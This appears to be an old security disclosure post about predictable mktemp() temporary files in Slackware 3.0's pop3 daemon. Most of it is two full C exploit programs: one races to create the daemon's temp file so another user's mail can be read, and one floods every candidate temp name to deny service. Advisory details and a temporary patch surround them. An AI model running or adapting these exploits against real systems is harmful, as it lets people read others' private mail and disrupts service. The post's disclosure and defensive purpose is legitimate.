As explained before in the mailx security post, there is a problem with usage of mktemp() in many programs. This is a follow-up to that, demonstrating the generic denial of service attack and a race condition attack on linux's Slackware 3.0 pop3 mail daemon. Refer to the original mailx post for information on the security concerns with the use of mktemp(). Linux's /usr/sbin/in.pop3d contains a mktemp() race condition, exploitable when pop client connects to the machine at the point a correct password for a user is entered. This allows you to read the contents of the mail spool of a user when they connect with a pop client. Program: pop3d (/usr/sbin/in.pop3d) Affected Operating Systems: linux - Slackware 3.0 with pop3d enabled Requirements: account on system, target user uses pop client Temporary Patch: disable pop3d Security Compromise: any user with an account can read mail of a user using a pop client to read mail. Author: Dave M. (davem@cmu.edu) Synopsis: The predictability of mktemp() is exploited to create the temporary files after the filenames have been determined but before they are actually created, allowing the mail being dumped to those temporary files to be read by the creator of the files. pop3d-exploit.c: /* This program creates temporary files used by in.pop3d (/usr/sbin/in.pop3d under Slackware 3.0), which can then be read by the program. This race condition is NOT always successful, it may take extreme conditions to ensure a high probability of success. Dave M. (davem@cmu.edu) */ #include #include #include #include main(int argc, char **argv) { int race; int i; char fname[80], tmpf[80]; /* hold filename */ umask(0); if(argc<1) { printf("pop3 racer\nSyntax: %s process-id\n",argv[0]); return -1; } /* create tmp file to race creating */ strcpy(tmpf,"/tmp/pop3"); for(i=strlen(argv[1]);i<6;i++) strcat(tmpf,"0"); strcat(tmpf,argv[1]); tmpf[9] = 'a'; race = creat(tmpf,S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH); while(1) { rename(tmpf,"/tmp/pop.exploit"); if(rename("/tmp/pop.exploit",tmpf) < 0) { printf("race lost - file created.\n"); /* catch 1/2 the losses */ break; } } } Program: Any with termination on mktemp() failure Affected Operating Systems: Any with predictable mktemp() return values Requirements: write access to directory temp files written to Security Compromise: denial of service Author: Dave M. (davem@cmu.edu) Synopsis: Many operating systems have an extremely limited temporary file creation algorithm, which results in denial of service attacks on any program that uses them exceedingly easy. deny-mktemp.c: /* This programs opens the complete set of temporary files tested with mktemp() for a given template (with 6 X's), usually resulting in the program terminating upon failure to find an open file. In pop3d, this prevents a pop client from reading their mail. Dave M. (davem@cmu.edu) */ #include #include #include #include #include /* template found in program's header file, minus X's */ #define TEMPLATE "/tmp/pop3" main(int argc, char **argv) { long int i,j; char fname[20]; if(argc<2) { printf("Syntax: %s process-id\n"); return -1; } j = strlen(TEMPLATE); strcpy(fname,TEMPLATE); for(i=strlen(argv[1]);i<6;i++) strcat(fname,"0"); strcat(fname,argv[1]); for(i=0;i<26;i++) { fname[j] = 'a' + i; creat(fname,O_WRONLY | O_CREAT); } for(i=0;i<26;i++) { fname[j] = 'A' + i; creat(fname,O_WRONLY | O_CREAT); } for(i=0;i<9;i++) { fname[j] = '0' + i; creat(fname,O_WRONLY | O_CREAT); } } /-------------\ |David Meltzer| |davem@cmu.edu| /--------------------------\ |School of Computer Science| |Carnegie Mellon University| \--------------------------/